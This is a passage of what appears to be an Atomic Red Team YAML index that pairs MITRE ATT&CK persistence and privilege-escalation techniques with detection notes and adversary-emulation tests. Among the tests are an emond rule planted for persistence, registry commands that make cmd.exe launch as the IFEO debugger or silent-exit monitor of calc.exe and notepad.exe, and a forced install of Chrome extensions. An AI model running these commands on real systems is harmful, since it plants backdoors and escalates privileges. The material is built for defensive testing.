Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) - - Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. - id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:37:25.307Z' - created: '2020-01-24T15:15:13.426Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Monitor emond rules creation by checking for files created - or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. - x_mitre_data_sources: - - File monitoring - x_mitre_contributors: - - Ivan Sinyakov - x_mitre_platforms: - - macOS - identifier: T1546.014 - atomic_tests: - - name: Persistance with Event Monitor - emond - auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) - daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - -' - supported_platforms: - - macos - input_arguments: - plist: - description: Path to attacker emond plist file - type: path - default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist - executor: - command: | - sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist - sudo touch /private/var/db/emondClients/T1546.014 - cleanup_command: | - sudo rm /etc/emond.d/rules/T1546.014_emond.plist - sudo rm /private/var/db/emondClients/T1546.014 - name: sh - elevation_required: true - T1546: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546 - url: https://attack.mitre.org/techniques/T1546 - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Event Triggered Execution - description: "Adversaries may establish persistence and/or elevate privileges - using system mechanisms that trigger execution based on specific events. Various - operating systems have means to monitor and subscribe to events such as logons - or other user activity such as running specific applications/binaries. \n\nAdversaries - may abuse these mechanisms as a means of maintaining persistent access to - a victim via repeatedly executing malicious code. After gaining access to - a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked.(Citation: - FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia - malware)\n\nSince the execution can be proxied by an account with higher permissions, - such as SYSTEM or service accounts, an adversary may be able to abuse these - triggered execution mechanisms to escalate their privileges. " - id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-21T18:48:27.576Z' - created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitoring for additions or modifications of mechanisms - that could be used to trigger event-based execution, especially the addition - of abnormal commands such as execution of unknown programs, opening network - sockets, or reaching out across the network. Also look for changes that do - not line up with updates, patches, or other planned administrative activity. - \n\nThese mechanisms may vary by OS, but are typically stored in central repositories - that store configuration information such as the Windows Registry, Common - Information Model (CIM), and/or specific named files, the last of which can - be hashed and compared to known good values. \n\nMonitor for processes, API/System - calls, and other common ways of manipulating these event repositories. \n\nTools - such as Sysinternals Autoruns can be used to detect changes to execution triggers - that could be attempts at persistence. Also look for abnormal process call - trees for execution of other commands that could relate to Discovery actions - or other techniques. \n\nMonitor DLL loads by processes, specifically looking - for DLLs that are not recognized or not normally loaded into a process. Look - for abnormal process behavior that may be due to a process loading a malicious - DLL. Data and events should not be viewed in isolation, but as part of a chain - of behavior that could lead to other activities, such as making network connections - for Command and Control, learning details about the environment through Discovery, - and conducting Lateral Movement. " - x_mitre_data_sources: - - API monitoring - - Windows event logs - - System calls - - Binary file metadata - - Process use of network - - WMI Objects - - File monitoring - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1098.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.002 - url: https://attack.mitre.org/techniques/T1098/002 - - source_name: Microsoft - Add-MailboxPermission - url: https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps - description: Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September - 13, 2019. - - url: https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - description: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. - source_name: FireEye APT35 2018 - - source_name: Crowdstrike Hiding in Plain Sight 2018 - url: https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ - description: 'Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the - Office 365 Activities API to Investigate Business Email Compromises. Retrieved - January 19, 2020.' - - source_name: Bienstock, D. - Defending O365 - 2019 - url: https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 - description: 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending - O365. Retrieved September 13, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exchange Email Delegate Permissions - description: |- - Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) - - This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) - id: attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:18:36.254Z' - created: '2020-01-19T16:54:28.516Z' - x_mitre_contributors: - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. - - A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring. - x_mitre_data_sources: - - Office 365 audit logs - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1574.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.005 - url: https://attack.mitre.org/techniques/T1574/005 - - source_name: mozilla_sec_adv_2012 - url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - description: Robert Kugler. (2012, November 20). Mozilla Foundation Security - Advisory 2012-98. Retrieved March 10, 2017. - - source_name: Executable Installers are Vulnerable - url: https://seclists.org/fulldisclosure/2015/Dec/34 - description: 'Stefan Kanthak. (2015, December 8). Executable installers are - vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation - of privilege. Retrieved December 4, 2014.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Executable Installer File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-26T19:20:23.030Z' - created: '2020-03-13T11:12:18.558Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - - User - - SYSTEM - x_mitre_detection: |- - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1133: - technique: - id: attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: External Remote Services - description: |- - Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. - - Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. - external_references: - - source_name: mitre-attack - external_id: T1133 - url: https://attack.mitre.org/techniques/T1133 - - external_id: CAPEC-555 - source_name: capec - url: https://capec.mitre.org/data/definitions/555.html - - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ - description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco - Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' - source_name: Volexity Virtual Private Keylogging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-06-19T20:07:09.600Z' - created: '2017-05-31T21:31:44.421Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - Linux - x_mitre_permissions_required: - - User - x_mitre_detection: Follow best practices for detecting adversary use of [Valid - Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to - remote services. Collect authentication logs and analyze for unusual access - patterns, windows of activity, and access outside of normal business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_contributors: - - Daniel Oakley - - Travis Smith, Tripwire - x_mitre_version: '2.1' - identifier: T1133 - atomic_tests: - - name: Running Chrome VPN Extensions via the Registry 2 vpn extension - auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 - description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, - please see "T1133\src\list of vpn extension.txt" to view complete list - -' - supported_platforms: - - windows - input_arguments: - chrome_url: - description: chrome installer download URL - type: url - default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe - extension_id: - description: chrome extension id - type: String - default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - -' - dependency_executor_name: powershell - dependencies: - - description: 'Chrome must be installed - -' - prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") - -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) - {exit 0} else {exit 1} - get_prereq_command: "Invoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.exe - #{chrome_url}\nStart-Process $env:temp\\ChromeStandaloneSetup64.exe /S \n" - executor: - name: powershell - elevation_required: true - command: | - $extList = #{extension_id} - foreach ($extension in $extList) { - New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force - New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} - Start chrome - Start-Sleep -Seconds 30 - Stop-Process -Name "chrome" - cleanup_command: | - $extList = #{extension_id} - foreach ($extension in $extList) { - Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} - T1574: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574 - url: https://attack.mitre.org/techniques/T1574 - - source_name: Autoruns for Windows - url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. - Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hijack Execution Flow - description: |- - Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. - - There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. - id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:28.288Z' - created: '2020-03-12T20:38:12.465Z' - x_mitre_data_sources: - - Environment variable - - Loaded DLLs - - Process command-line parameters - - Process monitoring - - File monitoring - - DLL monitoring - x_mitre_detection: |- - Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious. - - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Monitor for changes to environment variables, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1062: - technique: - id: attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Hypervisor - description: |- - **This technique has been deprecated and should no longer be used.** - - A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption. - external_references: - - source_name: mitre-attack - external_id: T1062 - url: https://attack.mitre.org/techniques/T1062 - - external_id: CAPEC-552 - source_name: capec - url: https://capec.mitre.org/data/definitions/552.html - - url: https://en.wikipedia.org/wiki/Hypervisor - description: Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016. - source_name: Wikipedia Hypervisor - - url: http://en.wikipedia.org/wiki/Xen - description: Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014. - source_name: Wikipedia Xen - - url: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf - description: Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted - Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014. - source_name: Myers 2007 - - url: http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html - description: virtualization.info. (Interviewer) & Liguori, A. (Interviewee). - (2006, August 11). Debunking Blue Pill myth [Interview transcript]. - Retrieved November 13, 2014. - source_name: virtualization.info 2006 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-30T13:44:04.712Z' - created: '2017-05-31T21:30:50.958Z' - x_mitre_deprecated: true - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing - analysis. Hypervisors emulate certain CPU instructions that would normally - be executed by the hardware. If an instruction takes orders of magnitude longer - to execute than normal on a system that should not contain a hypervisor, one - may be present. (Citation: virtualization.info 2006)' - x_mitre_data_sources: - - System calls - x_mitre_version: '2.0' - atomic_tests: [] - T1546.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.012 - url: https://attack.mitre.org/techniques/T1546/012 - - url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). - Retrieved December 18, 2017. - source_name: Microsoft Dev Blog IFEO Mar 2010 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December - 18, 2017. - source_name: Microsoft GFlags Mar 2017 - - url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent - Process Exit. Retrieved June 27, 2018. - source_name: Microsoft Silent Process Exit NOV 2017 - - url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image - File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. - source_name: Oddvar Moe IFEO APR 2018 - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml - description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. - Retrieved December 18, 2017. - source_name: FSecure Hupigon - - url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2 - description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December - 18, 2017. - source_name: Symantec Ushedix June 2008 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Image File Execution Options Injection - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) - - Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) - - Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. - - Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008) - id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-08-26T14:18:08.480Z' - created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) - - Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1546.012 - atomic_tests: - - name: IFEO Add Debugger - auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\calc.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - -' - cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger - /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: IFEO Global Flags - auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - description: 'Leverage Global Flags Settings - -' - supported_platforms: - - windows - input_arguments: - target_binary: - description: Binary To Attach To - type: Path - default: C:\Windows\System32\notepad.exe - payload_binary: - description: Binary To Execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: | - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 - REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" - cleanup_command: | - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 - reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1525: - technique: - external_references: - - source_name: mitre-attack - external_id: T1525 - url: https://attack.mitre.org/techniques/T1525 - - source_name: Rhino Labs Cloud Image Backdoor Technique Sept 2019 - url: https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/ - description: Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the - Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019. - - source_name: Rhino Labs Cloud Backdoor September 2019 - url: https://github.com/RhinoSecurityLabs/ccat - description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). - Retrieved September 12, 2019. - - source_name: ATT Cybersecurity Cryptocurrency Attacks on Cloud - url: https://www.alienvault.com/blogs/labs-research/making-it-rain-cryptocurrency-mining-attacks-in-the-cloud - description: Doman, C. & Hegel, T.. (2019, March 14). Making it Rain - Cryptocurrency - Mining Attacks in the Cloud. Retrieved October 3, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Implant Container Image - description: "Adversaries may implant cloud container images with malicious - code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images - (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular - container runtimes such as Docker can be implanted or backdoored. Depending - on how the infrastructure is provisioned, this could provide persistent access - if the infrastructure provisioning tool is instructed to always use the latest - image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA - tool has been developed to facilitate planting backdoors in cloud container - images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker - has access to a compromised AWS instance, and permissions to list the available - container images, they may implant a backdoor such as a [Web 